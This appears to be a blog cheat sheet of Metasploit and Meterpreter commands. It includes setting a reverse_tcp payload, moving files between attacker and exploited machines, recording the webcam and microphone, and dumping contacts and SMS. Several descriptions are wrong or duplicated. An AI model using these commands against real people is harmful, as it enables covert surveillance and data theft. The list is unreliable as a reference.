Useful Msfvenom and Metasploit Commands

Useful Msfvenom and Metasploit Commands

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Metasploit Framework, is a tool for developing and executing exploit code against a remote target machine.


The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Welcome today we have put a list of useful commands for Metasploit to help you get familiar with commands that are most used in Metasploit Framework.

Alternatively take a look Msfvenom and metasploit help manuals.

  • Webcam list (“List available webcams on target machine.”)
  • set payload windows/meterpreter/reverse_tcp (“Sets a reverse_tcp meterpreter session.”
  • Msfvenom -h (“list help options”)
  • Run webcam -p /var/www/ (“Stream webcam to /var/www.”)
  • Run webcam -s (“Stops webcam recording.”)
  • Mic -d 1 (“Record microphone default: 1 seconds.”)
    • Lpwd (“Local Print Working Directory”) prints local working directory.

 

  • Ls (This command shows the current working directory and detailed list of files within the current working directory.)
  • Cat (Displays Contents of a File)
  • Cd (Change Directory)
  • Edit (Downloads a copy of a file to temp files folder and opens it with the default text editor.)
  • Download file (“Download a file from the exploit machine to the attacker machine.”)
  • Download -r Documents (“Download a Directory from the exploited to the attacker machine”.)
  • Upload file (“Upload a file from the attacker to the exploit machine”.)
  • Upload -r Directory (“Upload a directory from the attacker to exploit machine”.)
  • Getlwd (Show working directory on local machine.)
  • Getwd (“Print working directory” on exploited machine.)
  • Info (“list information about targets, exploits, module author.”)
  • Printwd (“Print working directory” on exploited machine.)
  • Lcd (“Local Change Directory” – change local directory.)
  • Lpwd (“Local Print Working Directory”.)
  • Getlwd (“Get Local Working Directory”.)
  • Ls (“List Files & directories in a detailed list in current working directory.”)
  • Mkdir (“Make Directory”) Creates a new directory on the target machine.”)
  • Back (“retrieve information about an exploit.”)
  • Help (“display possible exploit commands.”)
  • check (“check to see if a target is vulnerable”)
  • Exploit (“launch a exploit attempt.”)
  • Search (“search module database.”)
  • Help search (“search for modules using keywords.”)
  • Show (“show you the available parameters for an exploit.”)
  • Show payloads (“list of available payloads.”)
  • Show targets (“return a list of operating systems which are vulnerable to the selected exploit.”)
  • Record_mic (“Record Microphone MsfVenom”)
  • webcam_snap (“Take a snapshot from webcam.”)
  • Webcam_stream (“Stream Webcam From Target Machine.”)
  • Dump_contacts (“Dump Targets Contact List to attackers machine.”)
  • Dump_sms (“Dump SMS Messages to attackers machines.”)
  • Geolocate (“Geolocate targets device.”)
  • Sessions -i (“list avalible sessions.”)
  • Sessions -i 1 (“Connect to an available session”.)
  • Ping 192.168.1.1 (“Check if host is alive”.)

If you know any commands we have left from the list feel free to leave them in the comments and we will add them.